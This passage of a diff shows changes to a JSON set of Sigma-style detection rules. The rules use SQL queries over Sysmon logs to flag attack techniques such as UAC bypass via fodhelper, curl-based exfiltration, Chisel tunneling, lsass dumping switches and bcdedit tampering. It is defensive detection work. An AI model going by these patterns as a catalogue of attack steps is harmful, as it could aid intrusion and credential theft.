Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - 
"attack.execution" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the 
service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", + "status": "stable", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1090.001" ], 
"falsepositives": [ - "Unknown" + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "title": "Suspicious ZipExec Execution", + "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target 
systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_hktl_zipexec.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when 
running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR 
CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. 
Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - 
"author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.persistence", + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentImage LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program 
Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": "experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "status": "test", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine 
LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msdt_susp_cab_options.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Scheduled Task Creation", - "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", "status": "test", - "description": "Detects the creation of scheduled tasks in user session", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" + "attack.exfiltration", + "attack.t1567", + "attack.t1105" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Scripts created by developers and admins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_schtasks_creation.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", - "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + 
"attack.persistence", + "attack.t1542.003" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_bcdedit_susp_execution.yml" + }, + { + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_powershell_frombase64string_archive.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "New DNS ServerLevelPluginDll 
Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" 
], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "PUA - Potential PE Metadata Tamper Using Rcedit", - "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", - "status": "experimental", - "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", - "author": "Micah Babinski", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036", - "attack.t1027.005", - "attack.t1027" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of the tool by administrators or users to update metadata of a binary" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE 